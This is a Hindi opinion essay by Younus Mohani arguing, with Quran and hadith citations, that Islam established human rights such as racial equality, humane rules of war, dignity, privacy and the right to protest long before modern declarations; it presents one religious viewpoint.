‘‘ किसी अरबी को गै़र-अरबी पर कोई बड़ाई नही हैं, न गै़र-अरबी पर कोई बड़ाई हैं। न गोरे को काले पर और न काले को गोरे पर । तुम सब आदम ‘‘(अलैहि0) की औलाद हो और आदम मिट्टी से पैदा हुए थे।’’ इस तरह इस्लाम ने तमाम मानव-जाति में बराबरी कायम की और रंग, नस्ल, भाषा और राष्ट्र की बिना पर सारे भेद-भावों की जड़ काट दी। जबकि अमेरिका जैसे तरक्की पसंद मुल्क में आज भी काले गोरे का भेद है जबकि इस्लाम ने इसे लगभग 1500 साल पहले ही खतम कर दिया और मानवाधिकारों की दुहाई देने वाले और झंडाबरदार अभी तक अपने यहां इन्सानी बराबरी का तसव्वुर मूर्त रूप से धरातल पर स्थापित नहीं कर सके
इस्लाम ने अच्छे कामों में सबके सहयोग की शिक्षा दी और बुराई से सबको रोकने का हुक्म दिया कुरआन में कहा गया ‘‘नेकी और परहेजगारी में सहयोग करो। बदी और गुनाह के मामले में सहयोग न करों।’’ (5:2)
इस्लाम ने युद्ध और संधि के नियम तय किए और लोगों को इस पर अमल करके दिखाया आज भी आधुनिक संसार इस्लाम के इन नियमों तक नहीं पहुंच सका हालांकि जो कुछ भी बदलाव किए इस्लाम की नकल ही की
इस्लाम में सबसे पहले दुश्मन मुल्क की जंग करने वाली आवाम (Combatant) और जंग न करने वाली(Non–Combatant) आबादी के बीच फर्क किया गया हैं। जहां तक जंग न करती हुई आबादी का संबंध है औरते, बच्चे, बूढ़े, बीमार, अंधे अपाहिज वगैरह उसके बारे में अल्लाह के रसूल ने फरमाया हैं।
जो लड़ने वाले नही हैं, उनको कत्ल न किया जाये
‘‘किसी बूढ़े, किसी बच्चे और किसी औरत को कत्ल न करों।’’
‘‘ खानकाह मे बैठे राहिबो को कत्ल न करो।’’ या इबादतगाहो मे बैठे हुए लोगो को न मारों।
इस्लाम ने युद्ध करने वालों को भी अधिकार दिए कहा गया कि युद्ध में किसी को ज़िंदा न जलाया जाए आग का अजाब न दिया जाये हदीस मे हूजूर (सल्ल0) का इरशाद हैं कि ‘‘ आग का अजाब देना आग के रब के सिवा किसी को जेबा नही देता।’’
युद्ध में घायल व्यक्ति को मारने से रोका गया‘‘किसी जख्मी पर हमला न करो।’’ यानी वह जख्मी जो लड़ने के काबिल न रहा हो, ,युद्ध बंदी को कत्ल न किया जाये साथ ही बांध कर कत्ल न किया जाये‘‘नबी (सल्ल0) ने बांध कर कत्ल करने या कैद की हालत में कत्ल करने से मना फरमाया।
जंग जीतने के बाद दुश्मन देश में कत्लेआम या लूटमार न की जाये यह हिदायत की गई कि दुश्मनों के मुल्क में दाखिल हो तो आम तबाही न फैलाओं। बस्तियों को वीरान न करो, सिवाये उन लोगो के जो तुम से लड़ते हैं और किसी आदमी के माल पर हाथ न डालो। हदीस में बयान किया गया हैं कि ‘‘नबी (सल्ल0) ने लूटमार से मना किया हैं। ‘‘और आप (सल्ल0) का फरमान था कि ‘‘लूट का माल मुरदार से ज्यादा हलाल नही हैं। ‘‘ यानी वह भी मुरदार की तरह हराम हैं। वहीं दुश्मन की लाशों के एहतराम का पाठ भी इस्लाम ने सिखाया ‘‘नबी (सल्ल0) ने दुश्मनों की लाशों, की काट, पीट या गत बिगाड़ने से मना फरमाया हैं।’’ और दुश्मन की लाशें उनके परिजनों को वापिस करने का हुक्म दिया गया अहजाब की जंग में दुश्मन का एक बड़ा मशहूर घुड़ सवार मर कर खन्दक में गिर गया। काफिरों ने अल्लाह के रसूल (सल्ल0) के सामने दस हजार दीनार पेश किये कि उसकी लाश हमे दे दीजिए। आप (सल्ल0) ने फरमाया कि मै मुर्दे बेचने वाला नही हूं। तुम ले जाओ अपनी लाश।
इस्लाम में वादाखिलाफी को भी सख्ती से मना कर दिया । अल्लाह के रसूल (सल्ल0) फौजो को भेजते वक्त जो हिदायतें देते थे, उनमें से एक यह थी कि ‘‘ वादाखिलाफी न करना। ‘‘ कुरआन और हदीस मे इस हुक्म को बार-बार दोहराया गया हैं कि दुश्मन अगर अपने वादे से फिरता है तो करे, लेकिन तुम को उसपर कायम रहना है।
इस्लाम ने जंग से पहले ऐलान करने का हुक्म दिया कुरआन मे फरमाया गया हैं कि, ‘‘अगर तुम्हे किसी कौम से ख्यानत ़(यानी संधि तोड़ने) का खतरा हो तो उसका अहद खुल्लमखुल्ला उसके मुंह पर मार दो।’’ ़(8:58) इस आयत में इस बात से मना कर दिया गया हैं कि जंग के ऐलान के बगैर दुश्मन के ‘खिलाफ जंग छेड़ दी जाये, सिवाय इसके कि दूसरे ने आक्रामक कार्यवाइयां शुरू कर दी हो।
इस्लाम ने लोगों की इज्जत की रक्षा के लिए साफ नियम दिए क़ुरआन में साफ हुक्म हैं कि ‘‘लोग एक दूसरे का मजाक न उड़ाये, एक दूसरे की हंसी न करें।’’ (49:11) ‘‘ और तुम आपस में एक दूसरे पर चोटें न करो (49:11) फब्तियां न कसो, इल्जाम न धरो, ताने न दो, खुल्लम खुल्ला या होठो के अन्दर या इशारों से उसको जलील न करो। ‘‘एक दूसरे के बुरे नाम न रखों।’’(49:11) ‘‘और तुम मे से कोई किसी की पीठ पीछे उसकी बुराई न करें।़(49:12) यह इस्लाम में सभी को अधिकार है कि वह अपने आत्मसम्मान के साथ जीवन व्यतीत कर सके और कोई अमीर किसी गरीब को बेइज्जत नहीं कर सकता।
इस्लाम लोगों को उनकी व्यक्तिगत जीवन की सुरक्षा के संबंध में स्पष्ट निर्देश देता है कुरआन का हुक्म हैं कि ‘‘ एक दूसरे के हालात की टोह में न रहा करों।’’ (49:12) ‘‘ लोगों के घरों में उनकी इज़ाज़त के बगैर अन्दर न जाओं।’’ ़(24:27) अल्लाह के रसूल (सल्ल0) ने यहां तक ताकीद की कि आदमी खुद अपने घर में अचानक दाखिल न हो, बल्कि किसी न किसी तरह घर वालों को खबरदार कर दें कि वह अन्दर आ रहा हैं ताकि मां बहनों और जवान बेटियों पर ऐसी हालत मे नजर न पड़े, जिसमें न वह उसे पसन्द कर सकती हैं कि उन्हे देखा जाये। न खुद वह आदमी यह पसन्द करता हैं कि उन्हे देखे। दूसरों के घर में झांकने की कोशिश करना भी सख्त मना हैं। ‘‘ हूजूर (सल्ल0) ने दूसरे का खत तक उसकी इज़ाज़त के बगैर पढ़ने से मना फरमाया हैं। यहां तक कि कोई अपना खत पढ़ रहा हो और दूसरा आदमी झांक कर उसे पढ़ने लगे तो यह भी सख्त मना हैं। जबकि आधुनिक दुनिया में सबसे पहले हमला निजिता पर ही किया गया और अब किसी भी तरह आपकी नीजिता सुरक्षित नहीं है क्योंकि तकनीक के नाम पर इस अधिकार को पूरी तरह से समाप्त कर दिया गया है
इस्लाम के दिये हुए अधिकारों में से एक अधिकार जुल्म के खिलाफ आवाज उठाने का अधिकार हैं। अल्लाह का इरशाद हैं कि ‘‘अल्लाह को बुराई के साथ आवाज बुलन्द करना पसन्द नही हैं,सिवाये उस आदमी के जिस पर जुल्म किया गया हो।’’ (4:148) यानी हर इन्सान को ज़ुल्म के खिलाफ आवाज उठाने का पूरा हक़ है।
इस्लाम लोगों को भलाई के लिए अपनी राय रखने की पूरी स्वतंत्रता देता है बुराई को बढ़ावा देने के लिए नहीं ।
यानी इस्लाम में लोगों को हर तरह का अधिकार जोकि उन्हें एक अच्छा जीवन जीने के लिए आवश्यक है प्रदान किया ताकि एक सभ्य और मुहब्बत वाला समाज बने लेकिन इस्लाम के अनुयायियों ने भी न तो इन अधिकारों को सही से समझने का प्रयास किया और न ही इन्हें अपने जीवन में शामिल किया जिस कारण उनके खिलाफ एक प्रोपेगंडा खड़ा किया जा सका और उन्हें रूढ़िवादी कहा जाने लगा जबकि सत्यता यह है जब लोग इन्सान को इन्सान नहीं मान रहे थे तब इस्लाम गुलामों के हक़ बता रहा था ,बेटियों को रहमत,औरतों को एहतराम के लायक कहा जा रहा था और इसे अमल में लाया जा रहा था,अल्लाह के नबी ने जब मदीना स्टेट का निर्माण किया और उसका लिखित संविधान मिसाके मदीना यानी चार्टर ऑफ मदीना लागू किया जिसमे धार्मिक अल्पसंख्यकों को जिस प्रकार अधिकार दिए गए और जैसा न्याय का शासन कायम किया गया वह रहती दुनिया तक मिसाल है। मानवाधिकारों की सार्वभौमिकता घोषणा से 1400 साल पहले ही उससे अधिक और वास्तविक रूप से अधिकारों को न सिर्फ घोषित अपितु उन्हें व्यव्हार में इस्लाम द्वारा लाया चुका था ।
यूनुस मोहानी
8299687452,9305829207
younusmohani@gmail.com

LEAVE A REPLY

Please enter your comment!
Please enter your name here